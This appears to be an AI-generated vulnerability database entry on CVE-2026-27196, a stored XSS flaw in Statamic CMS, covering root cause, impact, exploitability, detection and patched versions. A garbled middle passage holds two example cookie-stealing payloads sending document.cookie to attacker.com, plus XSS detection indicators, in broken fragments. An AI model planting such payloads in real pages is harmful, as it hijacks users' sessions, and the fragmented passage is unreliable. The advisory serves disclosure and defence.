
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27196 is a stored cross-site scripting (XSS) vulnerability in Statamic CMS, a Laravel and Git-powered content management system, titled "Privilege Escalation via Stored Cross-Site Scripting." It affects Statamic versions 5.73.8 and below, as well as versions 6.0.0-alpha.1 through 6.3.1. The vulnerability was disclosed on February 18, 2026, by researcher "genneta" via the GitHub Security Advisory GHSA-8r7r-f4gm-wcpq, and was published to the NVD on February 21, 2026. The GitHub Security Advisory assigns a CVSS v3.1 score of 8.1 (High), while the NVD/Feedly data reflects a base score of 4.8 (Medium) — the discrepancy stems from differing confidentiality and integrity impact assessments (Github Advisory, Statamic Security Advisory).
The root cause is improper neutralization of user-controllable input in the HTML fieldtype component of Statamic's publish form (CWE-79). Authenticated users with field management permissions can inject arbitrary JavaScript into the html configuration of an HTML fieldtype, which is then rendered unsanitized in the browser of any higher-privileged user (e.g., an administrator) who views the affected publish form. The fix introduced DOMPurify sanitization via the dompurify library in the HtmlFieldtype.vue component, along with a new sanitize toggle (defaulting to true) in the PHP fieldtype configuration — meaning prior versions rendered raw HTML without any sanitization (Github Advisory, Patch 6.x, Patch 5.x).
Successful exploitation allows injected JavaScript to execute in the browser of a higher-privileged user (such as an administrator) when they view the compromised publish form, enabling session hijacking, credential theft, and unauthorized administrative actions. The scope change in the CVSS vector reflects that the impact crosses from the attacker's security context into the administrator's session context. While availability is unaffected, confidentiality and integrity of the administrator's session and accessible data are at significant risk, potentially enabling full CMS takeover (Statamic Security Advisory).
No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation as of the time of disclosure (Github Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.023% (0.000230), placing it in a low probability tier for near-term exploitation. Exploitation requires an authenticated attacker with field management permissions, limiting the attack surface to users who have been granted that specific role.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an image-based XSS vector like <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.<script>, onerror, javascript:, or other XSS-indicative strings.resources/blueprints/ or resources/fieldsets/) containing embedded HTML with script tags or event handlers.<script>, <img onerror=...>, fetch(...), XMLHttpRequest) within the html configuration field of any HTML fieldtype in Blueprint or Fieldset definitions.Statamic has released patched versions that resolve this vulnerability: upgrade to 5.73.9 (for the 5.x branch) or 6.3.2 (for the 6.x branch). The fix integrates DOMPurify to sanitize HTML fieldtype content before rendering, with sanitization enabled by default. As an interim measure, restrict field management permissions to only fully trusted users, and consider implementing a Content Security Policy (CSP) header to limit the impact of any XSS execution. There is no documented configuration-only workaround that fully mitigates the vulnerability without upgrading (Github Advisory, Patch 6.x, Patch 5.x).
The vulnerability was published by Statamic maintainer jasonvarga via the GitHub Security Advisory on February 18, 2026, with credit to researcher genneta for discovery. Coverage has been limited to automated vulnerability aggregators and security digest sites such as Vulners, CVEFeed, and Digg's Straylight Sentinel Brief. No significant independent researcher commentary or broader media coverage has been identified beyond standard CVE tracking and aggregation (Github Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."